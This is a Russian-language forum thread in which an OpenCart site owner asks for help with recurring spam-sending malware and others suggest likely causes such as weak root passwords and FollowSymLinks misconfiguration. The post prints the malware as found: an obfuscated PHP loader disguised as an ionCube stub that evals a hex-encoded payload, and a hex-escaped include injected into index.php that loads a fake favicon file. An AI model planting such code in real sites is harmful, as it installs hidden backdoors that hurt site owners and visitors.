Jump to content
Sign in to follow this  
JaguarTL

На сайт попадают вирусы

Recommended Posts

Здравствуйте, имеется сайт на opencart 2.1.0.1 

На сайт попадают вирусы, делающие автоматическую рассылку. На сервере появляются такие файлы ca3ytaoy.php, file52.php, ir3wfgkz.php и т.д. Файлы содержат:

<?php //00036b
if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0xa29-0x579)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;

?>
24M7FaU6fJ6Y16bM74C772K03d2Y0R4S1T7K27Z2I61792J8S27616G56D6B7a696527K3HdK3eG
27A78M6c6aU7a79U27B2B93b2479N75R6772J6420V3d2U0E41727I26L17M9282N76T26d6f6L
56a6TeM27L3d3Ce277Y4Q7W073O747aU77272T9I3b66F6Df726561G6368202B84N172T72C61
Y7W9G2824J7Oa6VfG6G16Lb7477E2c202N45IfX504f535I42c2Q024797567J7K264T2cM2024
5Ff434Of4Nf4Fb494L5R2J920617S3X20Z2K4N73787Z874W2E920I7Ub666f72656163682B0M
2U8247F3D78J7D8R74206T1L7T320V2A46c6c7A27268V7520D3d3Ae2024707A17a65N61B2F9
L207b24P70L717a6561203dQ20407F06U1636VbF282248L2aD22P2PcD2X0W247M071Z7Ga656
1L293b246Dc6cR727268J75202e3XdM202266653B564E6338T36K6X42d3I164Y35S332dE346
P435W32O2d39I306430R2JdX36J3O1H363E431373733326563D38K223bX24S636X87667W2C0
3d20N2F4L707N1P7aS656R120W5e207L37G5S62J737E47M228P7374X72V5f726M57065R6174
2T82E4C6cG6Fc7V27268X752c2Y02C8A7374726Vc656e2824N70X71H7aX65H6U129G2U02f20
7I3747F26c6E5Q6e2M82Y4J6cE6c72F72687C5292920Q2b20Q3129W2Ec20302cA20S7L3G7G4
Z7D26Bc656XeZ28Z24F7L0K71R7aP6Z5612M9293bD246368Y76672K0W3FdY2065787O06Wc6N
f64652D822M2A3222cY2024U63687Z6C67K2U9X3b6V966202S86V36f7J56eU742Y8246K3D68
7D6Q67J292P0K3d3Dd2Y0332920H7b65S7N661B6cQ2824S63Q6876675BbM31T5d28B2463D6K
87K6675Zb3D25dF2T929C3bA657869H74282C9X3b7d7d7Wd

 

В index.php вверху добавляется:

/*dbdb8*/

@include "\x2fvar\x2fwww\x2fwww\x2droo\x74/da\x74a/w\x77w/m\x75sco\x6fl.c\x6fm/c\x61tal\x6fg/c\x6fntr\x6flle\x72/fa\x76ico\x6e_42\x32f56\x2eico";

/*dbdb8*/

 

Share this post


Link to post
Share on other sites

На сайте стоят 2 модуля. 

1) Управление категориями +

2) Обмен данными с 1C v8.x (Tesla-Chita)

 

Помогите, пожалуйста, найти уязвимость

Share this post


Link to post
Share on other sites
Guest smartcoder

Недавно клиент спрашивал похожий вопрос, вирусы типа на сайте.

В итоге сам хостер потом предоставил им такую услугу "чистку вашего сайта от вирусов":D

Может в хостинге то дело?)

Share this post


Link to post
Share on other sites

в большинстве случаем такое на шарде бывает, когда не правильно настроен FollowSymLinks  https://habrahabr.ru/sandbox/90459/

Так же довольно часто бывает - пробивают через панель управления сервером которая открыта на распашку или же через ssh который доступен под root 

в одного клиента так и было, логин root пароль 6 букв, вот и приплыли после такого 

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.